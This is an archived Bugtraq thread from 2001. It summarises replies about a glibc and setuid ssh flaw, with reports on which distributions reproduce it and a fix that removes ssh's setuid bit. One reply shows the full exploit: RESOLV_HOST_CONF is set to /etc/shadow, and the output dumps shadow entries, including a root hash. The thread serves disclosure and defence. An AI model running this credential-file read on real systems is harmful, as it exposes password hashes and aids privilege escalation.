Bugtraq mailing list archives
Re: Glibc Local Root Exploit
From: Ben Greenbaum <bgreenbaum () SECURITYFOCUS COM>
Date: Wed, 10 Jan 2001 17:53:03 -0800
Summary of responses: ---------------------------------- From: Jag <agrajag () linuxpower org> On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:
This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1 following your example.
I have reproduced it with glibc-2.2 and openssh-2.3.0p1 The key is that you must actually ssh to a valid host. If ssh can't resolve the host, it won't display the contents of the file. ------------------------------------------------ From: Lukasz Trabinski <lukasz () lt wsisiz edu pl> On Wed, 10 Jan 2001, Thomas T. Veldhouse wrote:
This does not happen on my machine using glibc-2.2 and openssh-2.3.0p1 following your example.
Let's test it. :-) [lukasz@lt lukasz]$ ls -all /usr/bin/ssh -rwsr-xr-x 1 root root 176036 Jan 6 14:34 /usr/bin/ssh [lukasz@lt lukasz]$ export RESOLV_HOST_CONF=/etc/shadow [lukasz@lt lukasz]$ ssh lt /etc/shadow: line 1: bad command `root:$1$3qweG6dk$i1ZoWh6uqweiuaniVm1:11270:0:99999:7:::134537268' /etc/shadow: line 2: bad command `bin:x:10679:0:99999:7:::' /etc/shadow: line 3: bad command `daemon:x:10679:0:99999:7:::' /etc/shadow: line 4: bad command `adm:x:10679:0:99999:7::: Nice. :) [lukasz@lt lukasz]$ rpm -q openssh openssh-2.3.0p1-4 [lukasz@lt lukasz]$ rpm -q glibc glibc-2.2-9 All was taken from RH updates. [lukasz@lt lukasz]$ cat /etc/redhat-release Red Hat Linux release 7.0 (Guinness) but: [lukasz@yyy lukasz]$ ll /usr/bin/ssh -rwxr-xr-x 1 root root 176932 Nov 21 23:53 /usr/bin/ssh [lukasz@xxx lukasz]$ ssh xxx lukasz@xxx's password: glibc 2.2-9 openssh-2.3.0, RH 7.0. Sultion: Only passwd needs setuid flag. :) ------------------------------------------------------------------------- From: Alexander Schreiber <alexander.schreiber () informatik tu-chemnitz de> Tested on Debian 2.2 (potato) with OpenSSH-1.2.3 and libc6 2.1.3: does not work. ---------------------------------------------- From: Michael Devogelaere <michael () digibel be> It works on my system: glibc 2.2 and openssh-2.3.0p1 (all latest updates from redhat) (luckily enough i don't tolerate users on my system <grin>) ----------------------------------------- From: elliptic <elliptic () cipherpunks com> Likewise, I can not reproduce this bug on Slackware Linux 7.0, which is currently using glibc version 2.1.3. Additionally, this is the revision of glibc included with Slackware 7.1, which would likely also not be vulnerable. ------------------------------------------------------ From: Joseph Nicholas Yarbrough <nyarbrough () lurhq com> I am unable to reproduce this using slackware 7.1(glibc2.1.3). What version of slackware were these "others" reporting positive results from? ------------------------------------------------ From: Lukasz Trabinski <lukasz () lt wsisiz edu pl>
[lukasz@lt lukasz]$ rpm -q openssh openssh-2.3.0p1-4
I have tested 1.5-1.2.30 (with ssh root setuid, too. We can read /etc/shadow, too). :-) ------------------------------------------------
Current thread:
- Re: Glibc Local Root Exploit, (continued)
- Re: Glibc Local Root Exploit Gordon Messmer (Jan 10)
- Re: Glibc Local Root Exploit Philip Rowlands (Jan 10)
- Re: Glibc Local Root Exploit Ari Saastamoinen (Jan 10)
- Re: Glibc Local Root Exploit Matt Zimmerman (Jan 12)
- Re: Glibc Local Root Exploit Jerry Connolly (Jan 10)
- Veritas BackupExec (remote DoS) oh3mqu+bugtraq (Jan 15)
- Re: Glibc Local Root Exploit Joe (Jan 10)
- Re: Glibc Local Root Exploit Digital Overdrive (Jan 10)
- Re: Glibc Local Root Exploit Digital Overdrive (Jan 10)
- Re: Glibc Local Root Exploit Brian (Jan 10)
- Re: Glibc Local Root Exploit Ben Greenbaum (Jan 10)
- Re: Glibc Local Root Exploit Simon Cozens (Jan 12)
- Re: Glibc Local Root Exploit Matt Zimmerman (Jan 12)
- Re: Glibc Local Root Exploit Charles Stevenson (Jan 10)